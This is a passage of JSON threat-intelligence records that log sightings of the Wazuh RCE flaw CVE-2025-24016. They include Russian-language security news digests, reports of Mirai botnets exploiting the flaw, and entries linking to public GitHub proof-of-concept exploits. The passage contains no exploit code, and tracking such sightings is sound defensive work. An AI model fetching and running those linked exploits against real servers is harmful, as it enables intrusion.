\u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Hadoop YARN, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 TP-Link \u0438 ZTE.\n\n\u0412\u0442\u043e\u0440\u043e\u0439 \u0448\u0442\u0430\u043c\u043c Mirai, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 CVE-2025-24016, \u0431\u044b\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f, \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u044e\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u043e\u0433\u043b\u0430 \u0431\u044b\u0442\u044c \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0438\u0442\u0430\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 Mirai \u043d\u0435\u0443\u043a\u043b\u043e\u043d\u043d\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u043e\u0439 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441\u0442\u0430\u0440\u044b\u0445 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u043e\u0432 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0438\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0438 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u0432\u0435\u0436\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432.\n\n\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 (IoC) - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-06-10T19:30:06.000000Z"}, {"uuid": "bd3c8b52-2747-4c70-b4d9-6a20ef4b8d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/thehackernews/6967", "content": "A critical flaw in Wazuh Server (CVE-2025-24016) is being actively exploited to drop multiple Mirai botnet variants\u2014sparking massive DDoS attacks worldwide.\n\nMillions of IoT devices remain vulnerable, fueling relentless botnet growth and escalating global cyber threats.\n\nDetails here \u2193 https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html", "creation_timestamp": "2025-06-09T17:05:09.000000Z"}, {"uuid": "c8293de6-737b-4722-a82a-b1d0a5c09c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/2594", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-28T07:48:31.000000Z"}, {"uuid": "2e8d9c8d-542e-4bf3-a1fc-ccf9f402e44b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1570", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T17:29:45.000000Z"}, {"uuid": "5ad5f82f-8e59-4aea-bc63-379ac4a74ad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/ujFiItu52V2xrlsXGQiLeg4-Ra7OYcKL6d9yb2Hm6tXrw-g", "content": "", "creation_timestamp": "2025-02-17T04:00:12.000000Z"}, {"uuid": "461b17f7-250c-4644-87fa-6c162c54c5bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/pioHib2nR2XYsdiAWAKSjrwD2AgkHgdboZVz1fxlp4Zhpko", "content": "", "creation_timestamp": "2025-02-10T21:00:22.000000Z"}, {"uuid": "def849be-942d-4364-a26a-67f8271cb3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/true_secator/6862", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. \u041d\u0430\u0431\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043a\u0430\u043a\u00a0DRAY:BREAK, \u0442\u0435\u043f\u0435\u0440\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u043c Mirai. \u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u044b DrayTek Vigor.\n\n2. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr \u0432\u044b\u044f\u0432\u0438\u043b\u0438\u00a0\u0442\u0440\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\u00a0\u0432 Kentico Xperience CMS, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432.\n\n\u041e\u043d\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0434\u0432\u0430 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 RCE \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041f\u0430\u0442\u0447\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b, \u043d\u043e CVE \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442.\n\n3. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u0422\u0430\u043d \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u0434\u0432\u0435\u00a0\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 JavaScript XML-crypto, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u0438\u0441\u0442\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0433\u0434\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 XML-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432.\n\nWorkOS \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 SAML \u0438 \u0432\u044b\u0434\u0430\u0447\u0438 \u0441\u0435\u0431\u044f \u0437\u0430 \u043b\u044e\u0431\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 SAML, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443, \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b.\n\n4. \u0412 SIEM \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c Wazuh \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430\u00a0\u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (CVE-2025-24016).\n\n5. 0-day \u0432 Windows \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u043e\u0441\u044c\u043c\u0438 \u043b\u0435\u0442.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432 \u0444\u0430\u0439\u043b\u044b \u044f\u0440\u043b\u044b\u043a\u043e\u0432 LNK, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u0432\u0438\u0434\u0438\u043c\u044b \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n\n\u041f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 11 APT \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u043d\u0443\u043b\u044c \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445 LNK. \n\nTrend Micro\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043f\u043e\u0447\u0442\u0438 1000 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 LNK, \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u044e\u0449\u0438\u0445 \u044d\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u043e\u0439.\n\n\u041d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0434\u0438\u0432\u043b\u044f\u0435\u0442 Microsoft, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u0447\u0435\u0442\u0430 Trend Micro \u0432 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430. \u0412\u0438\u0434\u0438\u043c\u043e, \u043d\u0435 \u0441\u043e\u0433\u043b\u0430\u0441\u043e\u0432\u0430\u043b\u0438 \u043a\u0443\u0440\u0430\u0442\u043e\u0440\u044b.\n\n6. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 WordPress \u0441\u0442\u0430\u043d\u043e\u0432\u044f\u0442\u0441\u044f \u0432\u0441\u0435 \u043f\u0440\u043e\u0449\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u043d\u0430 \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0432\u044b\u0432\u043e\u0434\u044b \u0438\u0437\u00a0\u043e\u0442\u0447\u0435\u0442\u0430 Patchstack \u0437\u0430 2024 \u0433\u043e\u0434.\n\n43% \u0432\u0441\u0435\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 WordPress, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u043d\u0435 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043b\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0430 \u043f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u043b\u043e \u043f\u043b\u0430\u0433\u0438\u043d\u044b, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044f \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u044e, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0443\u044e\u0441\u044f \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0431\u044b\u043b\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u043b\u0438\u0448\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043d\u043e \u0432\u0440\u0435\u043c\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u044b\u043b\u043e \u043a\u043e\u0440\u043e\u0447\u0435, \u0447\u0435\u043c \u0432 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0433\u043e\u0434\u044b. \u041f\u043e \u0438\u0442\u043e\u0433\u0430\u043c \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043e \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043b\u0443\u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0441\u0430\u0439\u0442\u043e\u0432 WordPress.\n\n7. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 PRODAFT \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438\u00a0\u0434\u0432\u0443\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 mySCADA myPRO, \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0434\u0430\u043d\u043d\u044b\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e \u0432 \u0441\u0440\u0435\u0434\u0430\u0445 OT, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u041e\u0431\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421, \u043e\u0446\u0435\u043d\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0430 9,3 \u043f\u043e CVSS v4 \u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a CVE-2025-20014 \u0438 CVE-2025-20061.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b \u0432 mySCADA PRO \u041c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 1.3 \u0438 mySCADA PRO Runtime 9.2.1.", "creation_timestamp": "2025-03-20T18:30:07.000000Z"}, {"uuid": "3a2f60db-6fbb-489b-a4d7-1c600a3fd105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9735", "content": "CVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution\n\nhttps://cvereports.com/cve-2025-24016-unsafe-deserialization-vulnerability-in-wazuh-leading-to-remote-code-execution/", "creation_timestamp": "2025-03-17T21:13:20.000000Z"}, {"uuid": "8f2d9d08-fd2f-4019-a886-2734a8917152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981192096573813", "content": "", "creation_timestamp": "2025-02-10T19:16:08.283822Z"}, {"uuid": "d8d59cb7-5d7d-434c-881a-323711350f5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113981200022323322", "content": "", "creation_timestamp": "2025-02-10T19:18:09.799358Z"}, {"uuid": "787b6d75-4a0a-43e3-9697-f91a35088122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113981557167246023", "content": "", "creation_timestamp": "2025-02-10T20:49:06.914681Z"}, {"uuid": "4d82811d-fe42-45b4-bffd-220131d14c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhuaf6dyiy2e", "content": "", "creation_timestamp": "2025-02-10T22:54:13.477837Z"}, {"uuid": "6a2aa661-6236-4ac1-ad29-740a7c042b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lhxbfuaznk2j", "content": "", "creation_timestamp": "2025-02-12T03:50:33.423208Z"}, {"uuid": "e48615c3-7e3f-4851-b853-c061f773c77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/ethicalhack3r.bsky.social/post/3li2lnmf3ds22", "content": "", "creation_timestamp": "2025-02-13T11:31:47.939471Z"}, {"uuid": "ac55fa78-ad0b-4779-ada2-3a7895c900a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3liko4h2hek2y", "content": "", "creation_timestamp": "2025-02-19T20:58:27.698935Z"}, {"uuid": "39f514a1-36c9-49b7-83ab-923f41da565c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrjjtammz22g", "content": "", "creation_timestamp": "2025-06-13T22:55:48.980100Z"}, {"uuid": "6748b0a2-6e3c-462b-813f-b696ee827e89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/helpnetsecurity.com/post/3lraoqwinus2x", "content": "", "creation_timestamp": "2025-06-10T10:30:07.206170Z"}, {"uuid": "258f7249-04e1-489d-b698-97677ec1b717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3lraq6ocab3v2", "content": "", "creation_timestamp": "2025-06-10T10:55:46.931982Z"}, {"uuid": "ebc69258-66cd-4ea5-83b9-3604aed7a901", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/jbhall56/statuses/114659028201561577", "content": "", "creation_timestamp": "2025-06-10T12:18:46.225077Z"}, {"uuid": "a08e5a16-5009-4667-98c5-6d4873bc068f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lredynbes22h", "content": "", "creation_timestamp": "2025-06-11T21:28:10.157914Z"}, {"uuid": "f247deed-195d-4080-8e04-831c0c9d40f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/jbhall56.bsky.social/post/3lrautktedc23", "content": "", "creation_timestamp": "2025-06-10T12:18:54.165753Z"}, {"uuid": "d5885580-6500-41bc-8659-d037e60c9b77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3lrb2jzcnvc2j", "content": "", "creation_timestamp": "2025-06-10T14:00:59.377015Z"}, {"uuid": "ff50b845-395d-4233-bab2-d4e739514d1e", "vulnerability_lookup_origin": 